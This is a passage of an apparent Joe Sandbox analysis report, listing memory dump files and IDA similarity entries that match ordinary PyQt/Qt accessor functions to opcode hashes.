                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?fontBool_CharFormat@@FromLongTextUnderline@
                                                                                                                                                                                                                • String ID: QTextCharFormat$fontUnderline$fontUnderline(self) -> bool
                                                                                                                                                                                                                • API String ID: 1257658737-2331075746
                                                                                                                                                                                                                • Opcode ID: dee3dfe922db54ad9c41388a90926fecfc2e44dc1059069b0330c185a9c471a8
                                                                                                                                                                                                                • Instruction ID: b60ecfcc81037cd5eb53b4b8a19f9dd3cda9afa6ea29945ba84e5386027da16d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dee3dfe922db54ad9c41388a90926fecfc2e44dc1059069b0330c185a9c471a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20017CB5A08B46C1EB109F70E8886A837B8FB94784F9140B2CA5D03320CF7CD649C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?passwordDelay@FromHints@@LongLong_MaskStyle
                                                                                                                                                                                                                • String ID: QStyleHints$passwordMaskDelay$passwordMaskDelay(self) -> int
                                                                                                                                                                                                                • API String ID: 2384457329-852844189
                                                                                                                                                                                                                • Opcode ID: b1249ec08ec39163fa56b64a8ca5f2deba2498fcb83ada6aec1ae1a5f06ad432
                                                                                                                                                                                                                • Instruction ID: e588d3ace78bb4f2d51bc45954506446624abdfb573163083ae394a54f69783e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1249ec08ec39163fa56b64a8ca5f2deba2498fcb83ada6aec1ae1a5f06ad432
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72011AB5A08B46C1EB50DF70E8486A933A8FB54744FA140B6CA5C43320DF7CD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?formatFromIndex@InlineLongLong_Object@@Text
                                                                                                                                                                                                                • String ID: QTextInlineObject$formatIndex$formatIndex(self) -> int
                                                                                                                                                                                                                • API String ID: 1124102696-4158125137
                                                                                                                                                                                                                • Opcode ID: 2a6de199fef673410a5b2d7b1dec26ea8998e1d537f2c4977408f2b9faece461
                                                                                                                                                                                                                • Instruction ID: 586403c8c57769a37a953417b088e29fb8260f35b9be86afb79a0fc2b3212615
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a6de199fef673410a5b2d7b1dec26ea8998e1d537f2c4977408f2b9faece461
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 360116B5B08A46C1EB60DF71E8496A933B8FB54B44FA180B2CA5D43360CF7DD54AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Long$?cacheFromKey@Long_Palette@@
                                                                                                                                                                                                                • String ID: QPalette$cacheKey$cacheKey(self) -> int
                                                                                                                                                                                                                • API String ID: 2320330629-3830211667
                                                                                                                                                                                                                • Opcode ID: 597111e6d7163a6d03b56b730ce0d366d92a1e591436cfe90084aeadb628d1f5
                                                                                                                                                                                                                • Instruction ID: 342e40cd6f6c02e846808a64d8b9fa6fb9a52a532f44f6e21a5f885101452058
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 597111e6d7163a6d03b56b730ce0d366d92a1e591436cfe90084aeadb628d1f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26012CB5A08B47C1EB10DF61E8586A933A8FB85B44FA140B6CE5D43320DFBCD949C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?positionBlock@Cursor@@FromLongLong_Text
                                                                                                                                                                                                                • String ID: QTextCursor$positionInBlock$positionInBlock(self) -> int
                                                                                                                                                                                                                • API String ID: 3223810010-281852591
                                                                                                                                                                                                                • Opcode ID: 43a143c19e069f83f6300529b0a11c7dd3ee9a6f8a81e10df208d18756fc22bf
                                                                                                                                                                                                                • Instruction ID: 27d7c7061a6de0dd466a2c1ae93fc8c995af498f65b652a9919bb99edcbc592f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a143c19e069f83f6300529b0a11c7dd3ee9a6f8a81e10df208d18756fc22bf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68012CB5B08F56C1EB109F71E8486A933A8FB54784F9140B2CA5C53320CF7DD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?lengthDoubleFloat_FromSquared@Vector4
                                                                                                                                                                                                                • String ID: QVector4D$lengthSquared$lengthSquared(self) -> float
                                                                                                                                                                                                                • API String ID: 1654663368-1278755285
                                                                                                                                                                                                                • Opcode ID: c4fc69ece7319acf1cb637e9832749c80efaa04725e374bc5d1015fcf8320a0b
                                                                                                                                                                                                                • Instruction ID: da17624fba77f8f1b52e9add863b7c90c0b33ac69206ce5aa5546e856b21373b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4fc69ece7319acf1cb637e9832749c80efaa04725e374bc5d1015fcf8320a0b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E0121B1A08B46C1EB11DF70E8486A937B8FB55754FA140B2CA5D43320DF7DD59AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?revision@Block@@FromLongLong_Text
                                                                                                                                                                                                                • String ID: QTextBlock$revision$revision(self) -> int
                                                                                                                                                                                                                • API String ID: 951426660-719575464
                                                                                                                                                                                                                • Opcode ID: 374ac0ba64cbf39453fc5182a68cd01c4e794e8f39699853534e6c538362fc8c
                                                                                                                                                                                                                • Instruction ID: 76163e4ee30c65f2515b686f7adc5d6349278d6fbe4a8c87d2f150cf907a5575
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 374ac0ba64cbf39453fc5182a68cd01c4e794e8f39699853534e6c538362fc8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0012CB5B08B46D1EB209F70E8586A833A8FB94744F9140B6CA5D43320CF7CD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Checkable@FromItem@@LongStandard
                                                                                                                                                                                                                • String ID: QStandardItem$isCheckable$isCheckable(self) -> bool
                                                                                                                                                                                                                • API String ID: 2386528663-3434318923
                                                                                                                                                                                                                • Opcode ID: aa312d8b98150259836715bcaa803466a6e91f0835d1139ccac08603479462d0
                                                                                                                                                                                                                • Instruction ID: 1e454e205e54b7a33cfa8725ce660b6f84122258ead01d7e834813cf343693bc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa312d8b98150259836715bcaa803466a6e91f0835d1139ccac08603479462d0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05011AB5B08A46C1EB10DF61E8996A833A8FB94795F9140B6CA5D03320CF7CD559C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
